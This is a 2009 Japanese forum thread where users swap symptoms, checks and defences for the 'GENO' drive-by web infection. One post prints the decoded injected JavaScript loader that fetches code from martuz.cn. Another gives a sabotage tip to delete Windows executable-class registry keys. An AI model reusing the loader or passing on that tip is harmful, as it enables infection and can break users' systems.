1 :
名無しさん@お腹いっぱい。 :
2009/05/26(火) 23:06:08
2 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 23:06:53
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
http://www.btfree.info/file.php?action-get.html Code by: 790e3cc3feabad9
3 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 23:07:37
Bsqlsodbc.chmのファイルサイズの確認を確認する ■Windows XP: 改ざんされていなければ C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes ■Windows 2000: そもそも存在しないはずなので、 C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。 ※従来のテンプレのcmd.exeによる確認は危険 ★感染した場合 現状ではクリーンインストールするしかない
うったえてやう
5 :
名無しさん@お腹いっぱい。 :2009/05/26(火) 23:08:20
糞テンプレ修正完了
>>1 GENOウイルスチェッカー(アフィリエイトも充実)
ttp://geno.2ch.tc/ ← アフィリエイト(Amazon) ↓ソース
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001RN8TWK&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L8U&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50LBC&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
<iframe src="p://rcm-jp.amazon.co.jp/e/cm?t=geno2chtc-22&o=9&p=8&l=as1&asins=B001F50L76&fc1=000000&IS2=1<1=_blank&m=amazon&lc1=
0000FF&bc1=000000&bg1=FFFFFF&f=ifr" style="width:120px;height:240px;" scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>
Jane使っている人は
ツール-設定-コマンドで
コマンド名 適当
実行するコマンドに
ttp://geno.2ch.tc/index.php?url=$TEXT$LINK でjaneから検索でチェックできる
----------------------------- ActiveX (アクティブエックス) JavaScript (ジャバスクリプト) ----------------------------- どんな脆弱性があってもルーター(FW)と この2つをOFF(無効)にすれば無敵になれる
メールは クロネコメールをつかえ
ソフトはフリーソフトは使わず市販のソフトのみつかえ
>>8 "無敵"ではない
自分が知ってる限りでも
・HTML解釈ミスによるクラッシュ(IE)
・HTML解釈ミスによる任意コードの実行(IE)←うろ覚えだが存在した筈
・IIS稼働環境+IFRAME←推測だが、IISのURIバグで進入され得る可能性がある
・JPEG解釈ミスによるクラッシュ・任意コードの実行(2ch専用ブラウザ、IE、DLファイル経由他)←一時有名になったGDIのバグ
確かGIFでも起きたはず
副作用なしのクラッシュくらいは余裕で起きるし、静的コンテンツの任意コード実行の脆弱性が残ってればいくらでも進入の危険はある
12 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 05:48:27
【感染の確認方法】 @cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する 起動しない Asqlsodbc.chmのファイルサイズの確認を確認する 4.00 KB (4,096 バイト 見事に感染しています。 クリーンインストールしたいのですが、質問があります。 データをUSBに移そうとおもうのですが、移すファイルにGENOが入ってないか確かめたい のですが、どうすればよいでしょうか?
家族PCが感染してました 1.起動してもexplorerが起動しない(ユーザは一見何も出来ない) 2.CTRL+ALT+DELでタスクマネージャー立ち上げて新しいタスク実行 3.CMD起動 4.regedit.exe > 起動しない regedit.exe互換ソフトなんてありましたっけ?
↑窓の杜にあっさりありました 失礼しました まとめサイトみてもクリーンインストールばかりだったので (そのほうが安全だけどね) 対処療法例のひとつとして..
15 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 10:29:27
>>14 除去してねーしwww被害広げる前に、クリーンインストールしとけよ。
17 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 11:02:47
中古パソコンとパソコンパーツの通販ショップGENO www.geno-web.jp/ ↑ 2chのコピペブログを徘徊してたらGENOのサイトが勝手に立ち上がってた GENOリンクをクリックした覚えは無く沢山タブ開いてたからどこの何が原因か分かりません こちらのPCに感染らしき症状は見られずここ一週間で2回発生 こんなことってあります?
それマジで早急に精神科で見てもらった方がいいぞ
>>17 勝手に広告のウィンドウが開くのと同じ仕組みを利用して
感染させようとしている奴がいるのでしょ。
クリックしたのを忘れてるんだろ
21 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 11:56:51
疑わしい症状を発症したけれど… 勝手にAcrobatReaderが立ち上がってる。 メモリバカ食い。 CPU使用率90% トレンド、マカフィー、シマンテックのHPが見れない。 最新定義でウィルススキャン→検知せず。 システムの復元で発症一か月前に復元。 再度ウィルススキャン→検知せず。 症状が回復する。 GENOに感染したと思うんだ!だが、システムの復元で回復してるんだ! 事後だけど感染の確認方法をしてみたら異常はないんだけれど、 念の為、PCをクリーンインストールした方がいいだろうか。。。
力説するくらいならそのままで良いんじゃないの 多分大丈夫って意見が欲しい書き込みにしか見えないし
>>21 前スレの最後の方読んだ?
システムの復元だけじゃsqlsodbc.chmのサイズが
感染前に戻らない(=ウイルス消えない)
経験談が出てるよ
念の為でなく、真面目に駆除したかったら
クリーンインスコしましょう
それか、この際とことん実験する気あるなら ホストファイルのlocalhost以外のip 全削除した状態で最新パターンファイルに更新した後 ウイルスチェックして削除できるか見てみてよ 報告よろしこ
何がなんだかわからんやつは前消し
訂正 × localhost以外 ○ localhost以下の行(localhostの行は残す)
27 :
21です。 :2009/05/27(水) 12:25:22
今、前スレ読んできた…。 クリーンインストールしてみるよ。 ありがとん。
結局この騒動はなんだったんだろう
キャッシュを消しただけではどうにもならないということを学びました
30 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 13:52:41
31 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 13:57:02
★症状
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
★Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html ★感染確認方法
@regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとレジストリエディタが立ち上がらない。
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
Asqlsodbc.chmのファイルサイズの確認を確認する
Windows XP,Windows 2000にて、
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
※従来のテンプレのcmd.exeによる確認は危険
※従来のテンプレによるとWindows 2000ではsqlsodbc.chmが無いことになってるが
.NET framework等にくっついてインスコされる
32 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 13:58:38
★GENOウイルス感染からの復帰方法
(当方、この対処法について全く確認していません。自己責任でお願いします。)
1.C:\WINDOWS\Prefetch 内を全部削除
2.[Windowsキー] + [R] を押してファイル名を指定して実行で msconfig
3.スタートアップに何も書かれていない行があったのでチェックをOFF
4.再起動
5.C:\WINDOWS\System32\sqlsodbc.chm を削除 → 復活しないことを確認
6.正常なsqlsodbc.chm(
http://www1.axfc.net/uploader/Sc/so/2780 )に差し替え
34 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 14:33:37
しつこい
久々にきたら21になってて腰抜かした
よく考えたら10分前にもきてた
友達にどのプロバイダー使ってるか聞いたらさ、「教えぬ!」って言うわけよ。 ちょっとカチンと来たけど我慢してもう一度聞いたら、「だから教えぬ!」だってさ。 あんなに頑固な奴だとは思わなかったぜ
ocn
plala
40 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 16:46:03
eooooooooooooooooooooooo
■FireFox のリンク先読み機能を無効にする about:config network.prefetch-next → false
>>7 アフィチェッカーうぜぇ
GENOと共に死ね
ちなみにAmazonのアフィ
geno2chtc-22
geno2chtc
推奨NGワード 「アフィ」 「チェッカー」 「厨」
>>44 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::。:::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::。::::::...... ... --─- :::::::::::::::::::: ..::::: . ..::::::::
:::::::::::::::::...... ....:::::::゜::::::::::.. (___ )(___ ) ::::。::::::::::::::::: ゜.::::::::::::
:. .:::::。:::........ . .::::::::::::::::: _ i/ = =ヽi :::::::::::::。::::::::::: . . . ..::::
:::: :::::::::.....:☆彡:::: //[|| 」 ||] ::::::::::゜:::::::::: ...:: :::::
:::::::::::::::::: . . . ..: :::: / ヘ | | ____,ヽ | | :::::::::::.... .... .. .::::::::::::::
::::::...゜ . .::::::::: /ヽ ノ ヽ__/ ....... . .::::::::::::........ ..::::
:.... .... .. . く / 三三三∠⌒>:.... .... .. .:.... .... ..
:.... .... ..:.... .... ..... .... .. .:.... .... .. ..... .... .. ..... ............. .. . ........ ......
:.... . ∧∧ ∧∧ ∧∧ ∧∧ .... .... .. .:.... .... ..... .... .. .
... ..:( )ゝ ( )ゝ( )ゝ( )ゝ無茶しやがって… ..........
.... i⌒ / i⌒ / i⌒ / i⌒ / .. ..... ................... .. . ...
.. 三 | 三 | 三 | 三 | ... ............. ........... . .....
... ∪ ∪ ∪ ∪ ∪ ∪ ∪ ∪ ............. ............. .. ........ ...
三三 三三 三三 三三
三三 三三 三三 三三
ググるのは危ないって本当ですか? 一応ヤフーで検索してるけど不便で
チェッカーをNG入りさせるとソースチェッカーとかのレスも消えるからやだ
ここまで感染無し
49 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 17:05:22
気づいていないだけだったりして
ググる先生が気になるなら念のため、先読み無効にしておけば問題なし
sqlsodbc.chmのファイルサイズ確認って、 このファイル名で検索して出てきたサイズ見るだけじゃダメなの?
検索でやってみた。 sqlsodbc.chm サイズ 49.5 KB (50,727 バイト) ディスク上のサイズ 52.0 KB (53,248 バイト)
つまり検索では確認手段として十分とは言えないって事なのか
どうして「従来のテンプレのcmd.exeによる確認は危険」なんですか? もう何度かやったんですけど…
sqlsodbc.ch_ BASHO=I386 COPY SYSTEM32 RENAME sqlsodbc.chm RESTART
アフィリンク復活させやがった shine
予防策 レジストリエディタを開いて、以下のキーを全て削除して、再起動 HKEY_LOCAL_MACHINE\Software\CLASSES\.dll HKEY_LOCAL_MACHINE\Software\CLASSES\.exe HKEY_LOCAL_MACHINE\Software\CLASSES\.sys HKEY_LOCAL_MACHINE\Software\CLASSES\dllfile HKEY_LOCAL_MACHINE\Software\CLASSES\exefile HKEY_LOCAL_MACHINE\Software\CLASSES\sysfile 上記のキーはウィルス・スパイウェアを活動させます
せっかくテンプレから外してたのに
コピペでクレジットの情報とかも抜かれるって読んだんだけど本当? インターネットウォッチとかの記事読む限りFTP関係しか書いてないんだが
しらん
>>54 俺もサイズ 49.5 KB (50,727 バイト)だったけど大丈夫ってことだよな?
>>54 容量的には正常
更に気になるならハッシュ値の確認をどうぞ
正常なsqlsodbc.chm ファイルサイズ:50,727バイト CRC32:B61C7A80 MD5:F639AFDE02547603A3D3930EE4BF8C12 SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
もういいや 後はAVGちゃんが何とかしてくれるに決まってるもん
すまん教えてくれ。 そもそもGENOのサイトが改竄されたのは、ハッキングなの?
サイトの管理者がネットでいかがわしい所に行ったPCで踏んできたんじゃない?
じゃなくて 踏んできたPCでサイト更新したからじゃない?
踏んできたPCで更新かけても、 ファイル転送がSFTPだったら暗号とけなくて ウイルス涙目?
>>56 GENOじゃない他のウイルスでそれ起動させると悪化するやつがあるとかってどっかのスレで見た
自分もよく知らないけど健康なPCなら起動させても問題ないんじゃないの
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する 両方とも起動 Asqlsodbc.chmのファイルサイズの確認を確認する ↑いまこれを確認してるのですが、 cmd.exeの真っ黒い画面に「dir C:\WINDOWS\system32\sqlsodbc.chm」と打ち込んでも ファイルが見つかりませんと出ます。 Vistaだからでしょうか?
>>70 現時点でGENOからの説明は一切ないっぽい。
もし犯人がショッピングサイトだと知っていてハック&改竄したのだとしたら、
それこそクレカ情報とか心配だな。
GENOウイルス騒動で再考するマルウェア対策 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/27/news007.html 感染活動による攻撃者の狙いは、
ユーザーを詐欺サイトへ誘導する目的で検索エンジンの結果を書き換えたり、
不正広告を配信したりすることや、詐欺的ソフトのインストール、
個人情報の盗難、バックドアのインストールなどがあるとみられる。
いずれの場合でも、金銭やボットマシンの確保といったサイバー犯罪の流行に沿ったものである可能性が高い。
シマンテックセキュリティレスポンスの林薫主任研究員は、
「こうした攻撃では自動化された攻撃ツールを使われるのが一般的だが、
今回は人海戦術によってち密な計画で仕掛けられた可能性がある」と推測する。
GENO伝説ここに始まる。一気に全国区へ。
>>56 その書き込みをどこで見たのかわからんがWikiに載ってるまま指摘ないんだし問題ないよな…?
というかかなりの数の人がcmd.exeで確認しただろうしそれが危険だとしたらやばいと思うが
本当にこのGENOウィルスは豚インフルの感染の広がりと同期してるんじゃないか また冬に再流行とか止めてくれよ
Vista使えよ馬鹿?
83 :
56 :2009/05/27(水) 20:56:52
xp→windows7 vistaはスルー
>>1 はなんでわざわざ古いテンプレを使うの?
アホなの?バカなの?死ぬの?
>>84 今更、何を
楽天では昔からのデフォ仕様(暗黙の了解、自己責任)
っていうか、ネットのショッピングモール自体がどこも似たような事をやってる
まー、通販ではカード決済は出来るだけ避けろってこった
「通常購入データ.csv」「オークションデータ.csv」「プレゼントデータ.csv」「共同購入データ.csv」「資料請求データ.csv」 「商品問合せデータ.csv」となっており、名字・名前・郵便番号・住所・電話番号・ニックネーム・ メールアドレス・クレジットカード番号・クレジットカード名義人・クレジットカード有効期限といった各種個人情報が記載されています。 ネット通販だけでこれだけ情報売られるのか‥
アマゾンもアウトかしら タダで渡して売ってないから法的にはセーフ? このタイミングでこの告発ってのは厚労省に睨まれた結果なんだろうけど
>>76 vistaは sqlsodbc.chm の場所が違います。
C:\Windows\Help\mui\0411\sqlsodbc.chm
気が済むまでチェックするよろし。
>>66 初心者はレジストリいじるなって言われたんですが大丈夫でしょうか
普段使ってるアカウントの方は壷使えなくなった上すごい重くてネットできない だから別のアカウント使ってるんだけどタスクマネージャ見てたらプロセスがやけに少なくなってる 7つしかないよ。さっきはこれの4倍くらいあったのに クリーンインストールしたいけどネットの設定を戻せる気がしない
96 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 22:34:59
a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;if((u.indexOf("Chrome")<0) &&(u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0) &&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;"); document.write("<script src=//mart"+"uz.cn/vid/?id="+j+"><\/script>");}
97 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 22:37:04
>96はデコードしたスクリプト NT6とChromeは特別扱いらしい
いまさらいきなりなに
16日にはデコードされていたスクリプト 見た瞬間分かるような情報 いったい何がしたかったのか
>>89 アマゾンはほしいものリスト経由の個人情報流出事件が記憶に新しい
yahooも当然、前歴あり
ネット通販は、ある程度の流出は仕方ないくらいの認識じゃないとやっていけないよ
vistaでよかったわ
vistaでよかったと思える時が来るなんて思わんかった
なんだか可哀そうだぞw
105 :
名無しさん@お腹いっぱい。 :2009/05/27(水) 23:39:02
>100 テンプレートが改竄されてた事には触れてないな
関係ないけど、いまだに改竄を一瞬「かいそ」と読んでしまう。 わかってるねん、わかってるねんで?
関係無いけど、きじゃくせいって「既知の脆弱性」の略だと思ってた …どうした?
>しかもさまざまな亜種が存在、アンチウイルスソフトのアップデートでの完全対応は難しいのが現状です。しかし、不正侵入検知機能(IPS)を備えた統合セキュリティソフトでは、これらの被害を防げるのです。 断言しているけど大丈夫か? tp://shop.vector.co.jp/service/special/security/
>>108 なんだ知らなかったよ
JSをオフらなくてもソフトのIPSが防いでくれてたのか
一応ウイルスにかかった形跡もなかったから問題ないな
ところでavastとaviraもIPSって付いているのか?
>>100 FC2のブログとHPのサービス他4つ利用してるけどメール来ない…
>>110 ウイルスセキュリティゼロは付いていたっぽい
防御機能してたか知らんけど…
Vista+ UACにして適当な
>>108 を入れて
FIREFOX+NOSCRIPT+先読み無効
まめなうpデートで超おkなん?
でもショップGENOはどうやってウイルスにかかったんやろ?
アドベのアップもしなかったくらいだからノーガードやったかもな
>>113 しらねーよw
GENOはキャッシュ消せば治るとほざいてたくらいだから無防備仕様じゃろw
海外のeroticサイトでもみてたんだろか
>>111 が何気にゲンキがない
病気やったんやろか
dフルエンザにかかっても2日以内に タマゴ酒のめば直る
書き込み出来てるじゃねぇか。 ちなみにscrファイルを書き換えさせてるわけではないので、regedit.exeをregedit.scrにリネームして復元するべし。
誰でもある。 削除したらだめ。
自動アップデートが無効になってオーディオデバイスが無しになってマイクロソフトとか特定のサイトにアクセスできなくなるんだけどこれって感染してる?
hosts
失礼 hostsファイル開いてみそ 127.0.0.1localhost (127.0.0.1をローカルホストにする) の記述の後に、 マイクロソフトやアンチウィルス系の ドメインごちゃまんと追加されてるよ、きっと
ようつべの動画にリンク貼ったりしない方がいいのでしょうか
つべやにこにこは、ほぼ最新ver.のFlash Player でないと見られないんじゃないかな 逆に言うと、見られる人はFlash Playerから 感染する可能性が少ない 投稿された動画自体が汚染されてる可能性は、 自分にはわからない 問題はacrobatよな 告知情報見るまで、acrobat readerにjs使えるなんて 知らなかったものw
こう言う自己判断できない屑が動画サイト使うから動画サイト=キチガイと厨の巣、犯罪者予備軍の巣と言う感じ
日本は、いやアジアは、いや地球はキチガイと厨の巣、犯罪者予備軍の巣だな
>>132 あなたの祖国と日本を一緒にしないでいただきたい
>>60 やったらregeditやcmdが起動しなくなりました
さらにexplorerも起動しなくなりデスクトップには壁紙だけしか表示されなくなりました
osはvistaです
ちなみにデスクトップの壁紙は外人ニューハーフの裸体(完全無修正)で
アイコンをぎっしり詰めて分からない様にカモフラージュしてました
12点
136 :
134 :2009/05/28(木) 12:52:55
自己解決しました。
次スレいらないな。
GENO社員乙
139 :
名無しさん@お腹いっぱい。 :2009/05/28(木) 13:38:59
携帯でGENOウイルスのURL踏んじゃったんだけど、 携帯にも影響あるの?
おいおまいら 俺のケツの穴見たいか? 糞ひねり出すとこ見たいか?
142 :
名無しさん@お腹いっぱい。 :2009/05/28(木) 13:49:08
>>140 え、あるの・・・?
データ流出とかはないよな・・・
cmc確認、regedit確認、sqlsodbc.chmのファイルサイズ確認 nortonは普通に起動している、windowsupdateにもアクセス可能。 symantecにもアクセスできる。MD5も一致した。 問題なしですよね?
145 :
名無しさん@お腹いっぱい。 :2009/05/28(木) 14:42:22
いまだに騒いでるのは同人屋だけだと思ってた
「GENOウイルス」 朝日新聞社のお墨付き
>>144 そこまで確認して不安ならOS再インスコ汁
終了
まだまだ続くよ〜!
Windows2000の場合でも、 Visual Studio 6 SP5 以降のバージョン、Microsoft SQL Server 2000、.NetFramework 1.1 等がインストールされている場合にはMDAC 2.6〜2.8 がインストールされているので sqlsodbc.chm が存在する。 Office 2003をインストールしている場合もsqlsodbc.chm が存在してる可能性が有り。 通常は、Windows2000には同じsqlsodbcでもchmファイルではなく、 hlpファイルが常時存在し、 こちらは16.7 KB (17148 バイト) 、MD5:3177C8154F1011535FDD1B1B30D3D2E9 50727バイトじゃない!MD5:F639AFDE02547603A3D3930EE4BF8C12じゃない!感染してる! と勘違いしてクリーンインストールしちゃった人が多そう・・・
>>152 chmファイルとhlpを見間違うのはマヌケ
クリーンインストールも止むを得なす
cmd、regeditが起動できてsqlsodbc.chmも改変されてなくて 特定のサイトにアクセスできないんだけどこれって感染してる あと隠しファイルも表示できない
>>154 あたしエスパーだけどOS入れなおせばおk
今やってる
さっきまで、まとめサイトのメニューに「稲川淳二」って項目があったけど、なんだったんだろう。
バスターがアップデートできないんだけど… これもGENO?
>>154 以前からそうならルータの問題の可能性も有
先週再インスコした時は平気だった
165 :
名無しさん@お腹いっぱい。 :2009/05/28(木) 19:27:47
GENOウイルス何って4月ごろに騒いでた奴だろ? 亜種も出て随分たってるのに いまだに新マルウエアとか言ってるのか…
はいはいhostsファイル見て トレンドマイクロがブロックされてたら 削ってね〜
終わったね
まだまだ続くよ〜! と言いたいけど終わったね
今回を機にセキュリティーに目覚めたっつか、自分のPCを見つめ直す 機会にはなったんじゃないかな 操ってるのはあくまでも『人間』なんだしな
obfuscationがさらに高度になってきてるな
そうかそうか
ヴィスタだけどCPU使用率が異常なことになってる これやばくないか
低スペック+AERO有効
ははっ わろす
いや今まで使用率なんて何も触ってなけりゃ3%前後なのに 常にコア1が90%ぐらいになってる
見に覚えがないなら(UAC無視してないなら) sqlsodbc確認、ウィルススキャン&HijackThisのようなソフトで起動プロセスチェックして 問題なければ再起動して様子を見る
アンチウィルスFWソフトもたまに暴走するからな 例えば、ウィルスバスターとかウィルスバスターとかウィルスバスターとか!
バスターは自分をバスターし始める
ウィルスバスターかもしれんw
>>178 sqlsodbcってVistaに存在してる?
システムファイルの発見はCドライブごと検索するようこころがけるだけでこんなつまらんレスはなくなるだろう
始まったな
185 :
名無しさん@お腹いっぱい。 :2009/05/29(金) 00:19:26
掘り返すなよ・・
187 :
172 :2009/05/29(金) 00:22:49
いやあ、俺の発見したサイトはユーザーブロッキング機能によって 2度目の攻撃は行わないようになってたわ 察知されにくいようにしてるな
ウイルスバスターって人気ですね!
人気ですが、何か
バスター? 妨害攻撃で撃沈されてしまうけどね
191 :
172 :2009/05/29(金) 01:06:32
いやあ、入手した検体アンチオンラインスキャン、アンチリバースエンジニアリング、 アンチVMなどのアンチ仮想環境すべてかかってるわ
192 :
名無しさん@お腹いっぱい。 :2009/05/29(金) 01:15:02
感染して、先ほどリカバリした漏れです。 ふと思ったんだけれど、ファイアウォール導入してもGENOには無効?
終了
194 :
名無しさん@お腹いっぱい。 :2009/05/29(金) 01:26:01
p
195 :
172 :2009/05/29(金) 01:55:46
>>192 うん、無効
HIPS入れてかろうじて何とかなるかならないか
誰でも出来る簡単な対策 Vista使いましょう
つーか、使ってるAdobeを最新にしていればとりあえず今は大丈夫なんでそ?
あとjsの無効 jsでとばされる先の感染サイトがあったドメインへの アクセス制限(暫定)
それは、Adobe Readerのjavascript設定限定での話? それともブラウザ自体のscriptも常時切らないと駄目なのか(切らないと完全アウトかどうか)?
テンプレは特定のブラウザの導入とPDF、flashとjsの無効を推奨しているように見えるし不便過ぎる(firefoxが何たらの項。) もう感染してもいいから自分のお気に入りのサイトくらいは許可するよ 楽天で個人情報既に抜かれてるし自サイト(ブログ放置くらい)、カードないし別にいいや
>>199 現在のところはAdobe Reader側だけでOK。
ブラウザ側も保険として勧められているだけ。
203 :
名無しさん@お腹いっぱい。 :2009/05/29(金) 03:55:54
Genoよりエロゲ規制の方が数倍恐いわ
>>204 やられてるねえ
martuz●cn行き
martuzは停止してるんじゃなかったっけ
たぶんね 改竄されてるかどうかとは関係ないけど
208 :
204 :2009/05/29(金) 04:50:53
そうなんだ、やられていたか 俺みたいに行動範囲の狭い人間ですらぶち当たるってことは 相当ひどいってことだな こりゃ気をつけにゃいかんわ ありがと
見つけたんだったらここで報告するより サイト管理者に連絡してあげたらいいのに 何がしたいんだ ま、まさか 釣り とか
■ adobe javascriptをオフに adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す ↑これは英語版ではどこをどう選んだらいいのでしょうか? adobe reader9入れてから日本語パッチあてたり出来るんでしょうか?
211 :
210 :2009/05/29(金) 06:04:19
日本語版入れなおしました adobe javascript=acrobat javascriptでおkなのでしょうか? adobe javascriptなる項目が存在せずacrobat javascriptというのがあるのですが
212 :
210 :2009/05/29(金) 06:38:37
自己りますた
>>201 こうゆうヤツが普通にいるからネットは免許制&過失罪制度が必要なんだよ
自分の利便性最優先とか、どんだけ非社会的なんだよ
yabeeeesqlsodbc.chmが0byteになってた ちゃんと最新のに変えてjavaも切ってたのに何でだ
0byte化報告は前にもみたな genoっていうか、別物に感染したんじゃないか?
acrobatやflashの脆弱性を付いてクラッシュさせることで初めてパスなんかを盗むウィルスなんだから JAVAスクリプトがONかOFFかはあんまり関係なさそうだな
>>216 クラッシュはsniffing動作と関係ないだろ。
クラッシュさせるサイトにとばすのに js使ってるんでないの? だからFireFoxのリンク先の画像先読みする機能を オフにする話が出ると思った
修正案 ■ adobe readerを9.1.0にアップデートする とりあえず最新版にしましょう。
以上でGENOは防げるが亜種等のため以下推奨 ■ adobe javascriptをオフに adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す ■ブラウザでスクリプト使用を基本無効に設定 FirefoxにてNoscriptを利用 (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す) (sleipnir、IEでも上手に設定するとなんとかなります) ■ hostsファイル書き換え hostsファイルに以下の行を追加 127.0.0.1 martuz.cn hostsファイルの在処 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」 Windows 95/98/MEの場合→「C:\Windows」
動画サイトは見ない方が良いのか
対策してればどんどんみれ
Noscriptでjsを一時的に許可にしないと動画見れないし
■ hostsファイル書き換え はいらんなmartuzはしんでる 感染するなら他のアドレスだしそれの予測は困難 この書き換えでブロックしようってのは現実的じゃない
むしろ、新しい感染先が分かったら その都度どんどん書き加えていけばと思う
227 :
名無しさん@お腹いっぱい。 :2009/05/29(金) 10:14:41
QTにも脆弱性見つかってるから近い内導入される悪寒
まともな文章だが
ウィルスではなく、ウイルスなのは知ってるが、マルウェアがマルウエアだとは知らなかったなwww
所詮英語だからどう書こうがいい
ビールスしかみとめません
小さいィェォは大きく書くこと多い ウィルス→ウイルス フィルム→フイルム トェェェェイ→トエエエエイ
ヴァイラスで
新しい感染先は netstatでわかんねーかな セッション貼られてるの一瞬かなー
adobe javascriptはadobe readerを9.1.1にはないから...
無理せずに英語で書いていいぞ
sqlsodbc.chmが0byteになってたんでハッシュ値を確認しようと思ったらファイル自体が破損してるのか確認すら出来なかった Windows Updateにも繋がるしアンチウィルスもしっかり更新できる、cmdもregeditも立ち上がるし、そもそもadobe関連は全部最新のものに変えているしjavaは切ってある 一応カスペとNODとavastで別種のウィルスかと検索してみたがgenoは元よりナニも検出されない 一体なんだったんだろう おしえておじいさん
Java≠JavaScript
JavaとJavaScriptを混同してる奴を見ると、鼻の穴にパチンコ玉を突っ込んで やりたくなるよな。それも両方の穴に3つずつ、奥までみっちり詰め込んで やりたい。
>>243 いいから次スレはテンプレ修正しとけってw
そこまでやって、hostsファイルの改ざんだけは 頑なに調べないのは何でだろう
キチガイが起きてきたみたいだな
※>60は実行しないでください。
病気にかからない方法の一つ ・あらかじめ死んでおく ってことかなw
2ヶ月前amzonに注文したブツが一昨日か昨日が配送予定日になってるのに 確認メールが来なかった忘れてるのだろうか・・それとももしや・・
amazonは問題ないが、、ほしいものリストは罠なので気をつけるように
1修正案
■ adobe readerを9.1.0にアップデートする
ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。
インストール後本体をアップデートしておく事
■ adobe flashplayerを最新版に更新
ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨
■ adobe javascriptをオフに
adobe readerを開いて メニュー→編集→環境設定→javascript→adobe javascriptを使用のチェックを外す
■ブラウザでスクリプト使用を基本無効に設定
FirefoxにてNoscriptを利用
(Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す)
(sleipnir、IEでも上手に設定するとなんとかなります)
優先度低
■ Vistaの人ははUACをONにする
■ hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
hostsファイルの在処
Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」
